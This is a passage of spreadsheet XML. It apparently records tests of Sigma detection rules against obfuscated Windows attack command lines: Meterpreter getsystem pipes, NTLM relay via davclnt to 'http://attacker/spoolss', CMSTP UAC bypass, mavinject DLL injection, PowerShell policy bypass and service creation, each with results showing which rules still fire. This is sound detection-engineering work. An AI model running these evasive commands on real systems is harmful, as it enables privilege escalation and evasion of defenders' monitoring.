          <t>Potential Meterpreter/CobaltStrike Activity</t>
        </is>
      </c>
      <c r="D188" s="44" t="inlineStr">
        <is>
          <t>15619216-e993-4721-b590-4c520615a67d</t>
        </is>
      </c>
      <c r="E188" s="43" t="inlineStr">
        <is>
          <t>%COMSPEC% /c e^cho 559891bb017 &gt; \\.\\pipe\\5e120a</t>
        </is>
      </c>
      <c r="F188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I188" s="43" t="n"/>
      <c r="J188" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K188" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="189" ht="15.75" customHeight="1" s="42">
      <c r="A189" s="43" t="n"/>
      <c r="B189" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_meterpreter_getsystem</t>
        </is>
      </c>
      <c r="C189" s="43" t="inlineStr">
        <is>
          <t>Potential Meterpreter/CobaltStrike Activity</t>
        </is>
      </c>
      <c r="D189" s="43" t="inlineStr">
        <is>
          <t>15619216-e993-4721-b590-4c520615a67d</t>
        </is>
      </c>
      <c r="E189" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Temp\payload.dll, a /p:tmexsn</t>
        </is>
      </c>
      <c r="F189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I189" s="43" t="n"/>
      <c r="J189" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K189" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="190" ht="15.75" customHeight="1" s="42">
      <c r="A190" s="43" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B190" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_meterpreter_getsystem</t>
        </is>
      </c>
      <c r="C190" s="43" t="inlineStr">
        <is>
          <t>Potential Meterpreter/CobaltStrike Activity</t>
        </is>
      </c>
      <c r="D190" s="43" t="inlineStr">
        <is>
          <t>15619216-e993-4721-b590-4c520615a67d</t>
        </is>
      </c>
      <c r="E190" s="43" t="inlineStr">
        <is>
          <t>%COMSPEC% /c e^cho 559891bb017 &gt; \\.\\pipe\\5e120a</t>
        </is>
      </c>
      <c r="F190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I190" s="43" t="n"/>
      <c r="J190" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K190" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="191" ht="15.75" customHeight="1" s="42">
      <c r="A191" s="44" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B191" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_meterpreter_getsystem</t>
        </is>
      </c>
      <c r="C191" s="44" t="inlineStr">
        <is>
          <t>Potential Meterpreter/CobaltStrike Activity</t>
        </is>
      </c>
      <c r="D191" s="44" t="inlineStr">
        <is>
          <t>15619216-e993-4721-b590-4c520615a67d</t>
        </is>
      </c>
      <c r="E191" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Temp\payload.dll, a /p:tmexsn</t>
        </is>
      </c>
      <c r="F191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I191" s="43" t="n"/>
      <c r="J191" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K191" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="192" ht="15.75" customHeight="1" s="42">
      <c r="A192" s="44" t="inlineStr">
        <is>
          <t>t1212</t>
        </is>
      </c>
      <c r="B192" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_ntlmrelay</t>
        </is>
      </c>
      <c r="C192" s="44" t="inlineStr">
        <is>
          <t>Suspicious NTLM Authentication on the Printer Spooler Service</t>
        </is>
      </c>
      <c r="D192" s="44" t="inlineStr">
        <is>
          <t>bb76d96b-821c-47cf-944b-7ce377864492</t>
        </is>
      </c>
      <c r="E192" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\.\System32\davclnt.dll,DavSetCookie http://attacker/spoolss</t>
        </is>
      </c>
      <c r="F192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I192" s="43" t="n"/>
      <c r="J192" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K192" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="193" ht="15.75" customHeight="1" s="42">
      <c r="A193" s="44" t="inlineStr">
        <is>
          <t>t1212</t>
        </is>
      </c>
      <c r="B193" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_ntlmrelay</t>
        </is>
      </c>
      <c r="C193" s="44" t="inlineStr">
        <is>
          <t>Suspicious NTLM Authentication on the Printer Spooler Service</t>
        </is>
      </c>
      <c r="D193" s="44" t="inlineStr">
        <is>
          <t>bb76d96b-821c-47cf-944b-7ce377864492</t>
        </is>
      </c>
      <c r="E193" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe davclnt.dll,DavSetCookie http://attacker/spoolss</t>
        </is>
      </c>
      <c r="F193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I193" s="43" t="n"/>
      <c r="J193" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K193" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="194" ht="15.75" customHeight="1" s="42">
      <c r="A194" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B194" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C194" s="44" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D194" s="44" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E194" s="44" t="inlineStr">
        <is>
          <t>cmstp.exe "/s" "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf" "/au"</t>
        </is>
      </c>
      <c r="F194" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G194" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H194" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I194" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP (e66779cc-383e-4224-a3a4-267eeb585c40)</t>
        </is>
      </c>
      <c r="J194" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K194" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="195" ht="15.75" customHeight="1" s="42">
      <c r="A195" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B195" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C195" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D195" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E195" s="43" t="inlineStr">
        <is>
          <t>cmstp.exe /s /ni "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf"</t>
        </is>
      </c>
      <c r="F195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G195" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H195" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I195" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP (e66779cc-383e-4224-a3a4-267eeb585c40)</t>
        </is>
      </c>
      <c r="J195" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K195" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="196" ht="15.75" customHeight="1" s="42">
      <c r="A196" s="43" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B196" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C196" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D196" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E196" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /injECTrUnnING C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G196" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H196" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I196" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J196" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K196" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="197" ht="15.75" customHeight="1" s="42">
      <c r="A197" s="44" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B197" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C197" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D197" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E197" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /InJecTRunninG C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G197" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H197" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I197" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J197" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K197" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="198" ht="15.75" customHeight="1" s="42">
      <c r="A198" s="43" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B198" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C198" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D198" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E198" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /"INJECTRUNNING" C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H198" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I198" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J198" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K198" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="199" ht="15.75" customHeight="1" s="42">
      <c r="A199" s="44" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B199" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C199" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D199" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E199" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 -"INJECTRUNNING" C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H199" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I199" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J199" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K199" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="200" ht="15.75" customHeight="1" s="42">
      <c r="A200" s="44" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B200" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C200" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D200" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E200" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /injeCtRuNNING C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F200" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G200" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H200" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I200" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J200" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K200" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="201" ht="15.75" customHeight="1" s="42">
      <c r="A201" s="44" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B201" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C201" s="44" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D201" s="44" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E201" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\S^OFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 10 /f</t>
        </is>
      </c>
      <c r="F201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I201" s="43" t="n"/>
      <c r="J201" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K201" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="202" ht="15.75" customHeight="1" s="42">
      <c r="A202" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B202" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C202" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D202" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E202" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F202" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I202" s="43" t="n"/>
      <c r="J202" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K202" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="203" ht="15.75" customHeight="1" s="42">
      <c r="A203" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B203" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C203" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D203" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E203" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I203" s="43" t="n"/>
      <c r="J203" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K203" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="204" ht="15.75" customHeight="1" s="42">
      <c r="A204" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B204" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C204" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D204" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E204" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F204" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G204" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H204" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I204" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J204" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K204" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="205" ht="15.75" customHeight="1" s="42">
      <c r="A205" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B205" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C205" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D205" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E205" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F205" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G205" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H205" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I205" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J205" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K205" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="206" ht="15.75" customHeight="1" s="42">
      <c r="A206" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B206" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C206" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D206" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E206" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H206" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I206" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J206" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K206" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="207" ht="15.75" customHeight="1" s="42">
      <c r="A207" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B207" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C207" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D207" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E207" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H207" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I207" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J207" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K207" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="208" ht="15.75" customHeight="1" s="42">
      <c r="A208" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B208" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C208" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D208" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E208" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H208" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I208" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J208" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K208" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="209" ht="15.75" customHeight="1" s="42">
      <c r="A209" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B209" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C209" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D209" s="44" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E209" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c New-Service -Name svcHighPriv -BinaryPath""Name 'C:\windows\system32\cmd.exe' -StartupType Manual</t>
        </is>
      </c>
      <c r="F209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I209" s="43" t="n"/>
      <c r="J209" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K209" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="210" ht="15.75" customHeight="1" s="42">
      <c r="A210" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B210" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C210" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D210" s="43" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E210" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; 'New-Service' -Name svcHighPriv -BinaryPathName 'C:\windows\system32\cmd.exe'"</t>
        </is>
      </c>
      <c r="F210" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G210" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H210" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I210" s="4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210" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K210" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="211" ht="15.75" customHeight="1" s="42">
      <c r="A211" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B211" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C211" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D211" s="44" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E211" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c New-Service -Name svcHighPriv -Bin 'C:\windows\system32\cmd.exe' -StartupType Manual</t>
        </is>
      </c>
      <c r="F211" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G211" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H211" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I211" s="43" t="n"/>
      <c r="J211" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K211" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="212" ht="15.75" customHeight="1" s="42">
      <c r="A212" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B212" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C212" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D212" s="44" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E212" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe c^re^ate AtomicService bi^nPath= "C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F212" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G212" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H212" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I212" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J212" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K212" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="213" ht="15.75" customHeight="1" s="42">
      <c r="A213" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B213" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C213" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D213" s="43" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E213" s="43" t="inlineStr">
        <is>
          <t>sc.exe "create" AtomicService "binPath"= "C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F213" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G213" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H213" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I213" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J213" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K213" s="43" t="b">
